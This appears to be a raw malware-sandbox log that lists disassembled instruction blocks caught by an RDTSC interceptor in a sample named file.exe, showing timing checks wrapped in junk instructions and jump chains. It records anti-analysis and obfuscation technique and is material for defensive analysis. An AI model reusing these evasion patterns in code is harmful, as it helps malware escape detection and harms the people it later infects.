Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E02AF second address: 73E02EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9CD8F21B07h 0x00000008 pop eax 0x00000009 mov esi, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 mov edi, 52D31C80h 0x00000016 pop edi 0x00000017 mov al, 61h 0x00000019 popad 0x0000001a mov dword ptr [esp], edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9CD8F21AFCh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E02EC second address: 73E02F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E02F2 second address: 73E02F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E02F6 second address: 73E02FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E02FA second address: 73E038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [74E50B60h] 0x0000000e mov eax, 750BE5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 mov bx, 206Ah 0x00000019 mov eax, edx 0x0000001b popad 0x0000001c push 00000044h 0x0000001e pushad 0x0000001f mov eax, edi 0x00000021 pushfd 0x00000022 jmp 00007F9CD8F21AFFh 0x00000027 and al, FFFFFFBEh 0x0000002a jmp 00007F9CD8F21B09h 0x0000002f popfd 0x00000030 popad 0x00000031 pop edi 0x00000032 jmp 00007F9CD8F21AFEh 0x00000037 xchg eax, edi 0x00000038 pushad 0x00000039 pushad 0x0000003a mov edi, ecx 0x0000003c movzx ecx, di 0x0000003f popad 0x00000040 mov ebx, 4ED911E8h 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007F9CD8F21AFEh 0x0000004c xchg eax, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F9CD8F21B07h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E04B5 second address: 73E04D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65999h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E04D2 second address: 73E04F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, si 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E04F3 second address: 73E050E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop eax 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E050E second address: 73E053D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9CD8F21AFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E053D second address: 73E057F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c jmp 00007F9CD8E6598Eh 0x00000011 mov eax, dword ptr [ebx+50h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9CD8E65997h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E057F second address: 73E060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9CD8F21AFCh 0x00000013 xor cl, 00000018h 0x00000016 jmp 00007F9CD8F21AFBh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov bx, ax 0x00000020 pushfd 0x00000021 jmp 00007F9CD8F21B02h 0x00000026 or ah, 00000078h 0x00000029 jmp 00007F9CD8F21AFBh 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+54h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jmp 00007F9CD8F21AFBh 0x0000003c call 00007F9CD8F21B08h 0x00000041 pop eax 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E060F second address: 73E0698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65990h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c jmp 00007F9CD8E65990h 0x00000011 mov eax, dword ptr [ebx+58h] 0x00000014 jmp 00007F9CD8E65990h 0x00000019 mov dword ptr [esi+1Ch], eax 0x0000001c jmp 00007F9CD8E65990h 0x00000021 mov eax, dword ptr [ebx+5Ch] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov dx, F3E0h 0x0000002b pushfd 0x0000002c jmp 00007F9CD8E65999h 0x00000031 sbb ax, 9CE6h 0x00000036 jmp 00007F9CD8E65991h 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0698 second address: 73E069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E069F second address: 73E06B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+20h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 movsx edx, si 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E06B3 second address: 73E06E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov si, F9CDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+60h] 0x00000010 pushad 0x00000011 movzx esi, bx 0x00000014 pushad 0x00000015 mov esi, edi 0x00000017 movsx edx, cx 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esi+24h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9CD8F21AFEh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E06E4 second address: 73E06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E06E8 second address: 73E06EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E06EE second address: 73E074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, E219h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+64h] 0x0000000f jmp 00007F9CD8E65994h 0x00000014 mov dword ptr [esi+28h], eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9CD8E6598Eh 0x0000001e adc eax, 0A8202D8h 0x00000024 jmp 00007F9CD8E6598Bh 0x00000029 popfd 0x0000002a movzx eax, di 0x0000002d popad 0x0000002e mov eax, dword ptr [ebx+68h] 0x00000031 pushad 0x00000032 mov ecx, edx 0x00000034 mov edi, 7A5CDA20h 0x00000039 popad 0x0000003a mov dword ptr [esi+2Ch], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E074F second address: 73E0753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0753 second address: 73E0757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0757 second address: 73E075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E075D second address: 73E07DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov ax, F081h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [ebx+6Ch] 0x00000011 pushad 0x00000012 push esi 0x00000013 pushfd 0x00000014 jmp 00007F9CD8E65999h 0x00000019 sub ax, EE86h 0x0000001e jmp 00007F9CD8E65991h 0x00000023 popfd 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007F9CD8E65991h 0x0000002b adc si, 27E6h 0x00000030 jmp 00007F9CD8E65991h 0x00000035 popfd 0x00000036 popad 0x00000037 mov word ptr [esi+30h], ax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F9CD8E6598Dh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E07DF second address: 73E08BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8F21B07h 0x00000009 or cx, EFCEh 0x0000000e jmp 00007F9CD8F21B09h 0x00000013 popfd 0x00000014 mov cx, DDD7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ax, word ptr [ebx+00000088h] 0x00000022 jmp 00007F9CD8F21AFAh 0x00000027 mov word ptr [esi+32h], ax 0x0000002b pushad 0x0000002c mov cl, 18h 0x0000002e mov eax, edx 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+0000008Ch] 0x00000037 jmp 00007F9CD8F21B05h 0x0000003c mov dword ptr [esi+34h], eax 0x0000003f jmp 00007F9CD8F21AFEh 0x00000044 mov eax, dword ptr [ebx+18h] 0x00000047 jmp 00007F9CD8F21B00h 0x0000004c mov dword ptr [esi+38h], eax 0x0000004f jmp 00007F9CD8F21B00h 0x00000054 mov eax, dword ptr [ebx+1Ch] 0x00000057 pushad 0x00000058 pushfd 0x00000059 jmp 00007F9CD8F21AFDh 0x0000005e xor esi, 44987026h 0x00000064 jmp 00007F9CD8F21B01h 0x00000069 popfd 0x0000006a popad 0x0000006b mov dword ptr [esi+3Ch], eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E08BF second address: 73E08DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65992h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E08DE second address: 73E08E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E08E2 second address: 73E08E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E08E8 second address: 73E0926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8F21B02h 0x00000009 or ecx, 4ABCDF58h 0x0000000f jmp 00007F9CD8F21AFBh 0x00000014 popfd 0x00000015 mov si, AC0Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esi+40h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov si, bx 0x00000025 mov edi, 07E0EE1Eh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0926 second address: 73E099B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65994h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+00000080h] 0x0000000f pushad 0x00000010 mov si, 7E3Dh 0x00000014 push eax 0x00000015 mov ebx, 4611A12Ch 0x0000001a pop edi 0x0000001b popad 0x0000001c push 00000001h 0x0000001e jmp 00007F9CD8E65990h 0x00000023 nop 0x00000024 jmp 00007F9CD8E65990h 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F9CD8E6598Ch 0x00000033 add cx, 05A8h 0x00000038 jmp 00007F9CD8E6598Bh 0x0000003d popfd 0x0000003e mov si, C49Fh 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E099B second address: 73E0A15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2B27C716h 0x00000008 pushfd 0x00000009 jmp 00007F9CD8F21B07h 0x0000000e add cl, FFFFFF9Eh 0x00000011 jmp 00007F9CD8F21B09h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F9CD8F21B03h 0x00000024 xor si, EDAEh 0x00000029 jmp 00007F9CD8F21B09h 0x0000002e popfd 0x0000002f mov ah, BAh 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0A15 second address: 73E0A50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F9CD8E65990h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9CD8E65997h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0A50 second address: 73E0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0A56 second address: 73E0A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0A5A second address: 73E0A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov ebx, 0216F0DAh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0A6F second address: 73E0A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0A77 second address: 73E0A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9CD8F21B05h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0AB7 second address: 73E0ACA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0ACA second address: 73E0AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8F21B04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0AE2 second address: 73E0AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0AE6 second address: 73E0B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007F9CD8F21B07h 0x0000000f test edi, edi 0x00000011 jmp 00007F9CD8F21B06h 0x00000016 js 00007F9D4694069Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9CD8F21B07h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0B3E second address: 73E0B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65999h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c jmp 00007F9CD8E6598Eh 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9CD8E65997h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0B88 second address: 73E0BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9CD8F21AFCh 0x00000013 adc cx, CA18h 0x00000018 jmp 00007F9CD8F21AFBh 0x0000001d popfd 0x0000001e mov esi, 1AC21DCFh 0x00000023 popad 0x00000024 push 00000001h 0x00000026 jmp 00007F9CD8F21B02h 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f call 00007F9CD8F21AFDh 0x00000034 pop eax 0x00000035 mov ebx, 722EDA54h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0BF9 second address: 73E0BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0BFF second address: 73E0C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0C03 second address: 73E0C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9CD8E65991h 0x00000010 jmp 00007F9CD8E6598Bh 0x00000015 popfd 0x00000016 pushfd 0x00000017 jmp 00007F9CD8E65998h 0x0000001c sub cx, 4068h 0x00000021 jmp 00007F9CD8E6598Bh 0x00000026 popfd 0x00000027 popad 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov edi, 424E0FD6h 0x00000031 pushfd 0x00000032 jmp 00007F9CD8E65997h 0x00000037 or ch, 0000005Eh 0x0000003a jmp 00007F9CD8E65999h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0C95 second address: 73E0CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, C872h 0x00000007 mov edi, 15F2F9BEh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9CD8F21B00h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0CB9 second address: 73E0CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 jmp 00007F9CD8E6598Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bl, 90h 0x00000013 jmp 00007F9CD8E65996h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0CE8 second address: 73E0D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9CD8F21B01h 0x00000009 and si, 2006h 0x0000000e jmp 00007F9CD8F21B01h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F9CD8F21B00h 0x0000001a xor eax, 57CD7EA8h 0x00000020 jmp 00007F9CD8F21AFBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a jmp 00007F9CD8F21B09h 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F9CD8F21AFDh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0E37 second address: 73E0E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0E3D second address: 73E0E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0E41 second address: 73E0E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f mov ch, 2Ch 0x00000011 popad 0x00000012 mov dword ptr [esi+08h], eax 0x00000015 jmp 00007F9CD8E65995h 0x0000001a lea eax, dword ptr [ebx+70h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bh, DAh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E0FBD second address: 73E10CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, 74E806ECh 0x0000000e pushad 0x0000000f movzx esi, di 0x00000012 jmp 00007F9CD8F21B09h 0x00000017 popad 0x00000018 sub eax, eax 0x0000001a jmp 00007F9CD8F21B07h 0x0000001f lock cmpxchg dword ptr [edx], ecx 0x00000023 pushad 0x00000024 mov ecx, 0539863Bh 0x00000029 push esi 0x0000002a jmp 00007F9CD8F21B07h 0x0000002f pop esi 0x00000030 popad 0x00000031 pop edi 0x00000032 pushad 0x00000033 movsx ebx, si 0x00000036 jmp 00007F9CD8F21AFEh 0x0000003b popad 0x0000003c test eax, eax 0x0000003e pushad 0x0000003f call 00007F9CD8F21AFEh 0x00000044 movzx ecx, bx 0x00000047 pop edi 0x00000048 pushfd 0x00000049 jmp 00007F9CD8F21AFCh 0x0000004e or si, 3548h 0x00000053 jmp 00007F9CD8F21AFBh 0x00000058 popfd 0x00000059 popad 0x0000005a jne 00007F9D46940150h 0x00000060 pushad 0x00000061 pushfd 0x00000062 jmp 00007F9CD8F21B04h 0x00000067 add ch, FFFFFFA8h 0x0000006a jmp 00007F9CD8F21AFBh 0x0000006f popfd 0x00000070 popad 0x00000071 mov edx, dword ptr [ebp+08h] 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F9CD8F21B07h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E10CC second address: 73E10D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E10D2 second address: 73E115C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b pushad 0x0000000c mov esi, 3BD84BBDh 0x00000011 push eax 0x00000012 pop esi 0x00000013 popad 0x00000014 mov dword ptr [edx], eax 0x00000016 pushad 0x00000017 movsx ebx, cx 0x0000001a pushfd 0x0000001b jmp 00007F9CD8F21AFAh 0x00000020 sbb ax, 5EC8h 0x00000025 jmp 00007F9CD8F21AFBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+04h] 0x0000002f pushad 0x00000030 mov dl, cl 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 popad 0x00000037 mov dword ptr [edx+04h], eax 0x0000003a pushad 0x0000003b mov edi, esi 0x0000003d push ecx 0x0000003e mov ebx, 04E5B472h 0x00000043 pop edx 0x00000044 popad 0x00000045 mov eax, dword ptr [esi+08h] 0x00000048 pushad 0x00000049 mov cx, 853Bh 0x0000004d popad 0x0000004e mov dword ptr [edx+08h], eax 0x00000051 jmp 00007F9CD8F21AFDh 0x00000056 mov eax, dword ptr [esi+0Ch] 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F9CD8F21AFDh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E115C second address: 73E1162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1162 second address: 73E1166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E1166 second address: 73E11B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b pushad 0x0000000c mov dx, F5E8h 0x00000010 pushfd 0x00000011 jmp 00007F9CD8E65991h 0x00000016 xor cx, E156h 0x0000001b jmp 00007F9CD8E65991h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+10h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F9CD8E6598Dh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E11B2 second address: 73E11DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c jmp 00007F9CD8F21AFEh 0x00000011 mov eax, dword ptr [esi+14h] 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73E11DF second address: 73E1239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9CD8E65998h 0x0000000a popad 0x0000000b mov dword ptr [edx+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F9CD8E65993h 0x00000019 or si, B5FEh 0x0000001e jmp 00007F9CD8E65999h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
